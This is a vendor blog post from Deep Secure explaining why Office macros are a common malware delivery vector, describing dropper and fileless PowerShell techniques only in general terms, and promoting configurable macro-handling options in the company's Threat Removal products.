Tim Freestone by Tim Freestone | | Blog

When it comes to Office macros, it’s all about striking a balance, argues Deep Secure Principal Solutions Architect Tim Freestone.

Why Macros Matter

Office macros were invented as a mechanism to automate tasks and critically save people’s time. Certain sectors and types of user rely on them more than others. One such example is those users in financial technology organizations who use them extensively in their day-to-day work.

Another type of “user” who relies on macros is the cybercriminal. Macros are an easy attack vector. As much as 98% of Microsoft Office-targeted threats use macros. In operating systems such as Windows 10 and Windows 7, the security features mean that a macro is mainly used as a dropper.

For example, a valid web server is compromised by attackers and malicious executables are hosted on it. The macro delivered to the user’s desktop in an Office file, simply downloads the executable to the users’ desktop where it is executed.

In another example, a macro in an Office file, calls out to a piece of powershell and purposely never hits the disk, leaving as small an imprint as possible on the infected machine.

Either way, the point of using the macro embedded in the Office file is to sufficiently confuse a detection-based cyber defence that it has no idea what is going on and as a result it will allow the file through as it cannot be proven to have malicious content inside.

Macros matter both because organisations need them and because they are the most likely way of initiating an attack. So how do we square the circle?

 Configurable Options

Deep Secure’s Threat Removal technology has supported configurable options for dealing with Office macros since Version 1.10 but it’s worth recapping what these are and how they address the problem.

The first and most draconian option is to stop any document containing an Office macro from being delivered. For many this is not a practical solution to the problem and something more nuanced is required.

The second configurable option is to remove the Office macro prior to transforming the document. The macro – regardless of whether it is benign or malicious – is discarded at the outset and the rest of the document is then transformed and rendered 100% malware free before being delivered.

A third configurable option is to leave the Office macro untouched, transform the rest of the document to render it threat-free and then deliver it complete with the original macro.

Striking a Balance

In practice, these options are necessary because its important to find the right balance between security and productivity. Many organisations will be happy to remove Office macros, transform documents and deliver them to the vast majority of their users. Equally, chances are those organisations will have a community of, let’s call them power users. These may well be Microsoft Excel users and they will want access to Excel files containing macros because they need them to do their job.

The good news is that Deep Secure’s Threat Removal products, information eXchange (iX), Gateway eXchange (GX) and Application eXchange (AX) can all be configured to work with the existing boundary protection defence and support these differing requirements on a per filetype and a per user basis.

Good security must be flexible if it is to be effective. Deep Secure’s Threat Removal technology enables the organisation to enjoy the security that comes with transforming documents to remove any threat they might contain while at the same time allowing those that need Office macros, access to them so that they can work productively.

View all posts